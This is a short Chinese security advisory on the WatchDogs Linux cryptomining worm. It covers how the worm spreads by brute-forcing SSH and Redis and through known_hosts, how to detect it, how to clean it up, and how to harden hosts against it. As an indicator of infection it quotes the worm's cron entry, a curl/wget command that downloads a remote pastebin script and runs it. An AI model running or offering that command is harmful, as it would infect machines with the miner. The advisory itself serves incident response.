技术支撑单位360企业安全集团安服团队发现:近日发生多起企业内网遭Linux WatchDogs 挖矿病毒感染事件,单个内网服务器被感染数量达上百台。事件安全级别为“高危”。现将事件详情通报如下:
一、事件情况
该挖矿病毒为go语言编辑实现的 ELF 格式文件,包含通信、加密算法、Redis 攻击、SSH 爆破、挖矿(挖矿币种为门罗币)等模块。主要通过全网 SSH、OrientDB、Redis、Activemq等服务进行爆破,获取主机权限后提取/root/.ssh/kown_hosts 内容,并主动连接历史连接过的 linux 服务器等手段实现自我扩散。该病毒运行会消耗大量主机 CPU 资源,同时劫持部分系统命令实现自我保护,彻底清除难度较大。
二、影响范围
已安装watchdogs的linux系统主机及云主机。
三、处置建议
(一)检查是否已感染该病毒
1.进程特征:
ps -ef|grep watchdogs
ps -ef|grep ksoftirqds
注:带s 的为病毒进程、不带s的为系统正常进程。
2.计划任务特征:
curl –fsSL https://pastebin.com/raw/sByq0rym||wget -q-O-https://pastebin.com/raw/sByq0rym;
/etc/cron.d/root;
/var/spool/cron/root;
/var/spool/cron/crontabs/root。
存在上述特征表示主机已被感染。
(二)清理病毒文件
分析确认该病毒加载/usr/local/lib/libioset.so动态链接库并将路径写入/etc/ld.so.preload 实现进程隐藏,建议使用busybox进行查杀。
(三)安全防护
1.为Redis 添加密码验证,禁止外网访问Redis。
2.低权限运行Redis服务。
3.禁止将连接机器私钥直接放至服务器内,如有必要建议设置密码。
4.通过有限机器作为跳板机实现对其他内网机器的访问,避免所有机器随意互联互通,跳板机禁止部署相关可能存在风险的服务和业务。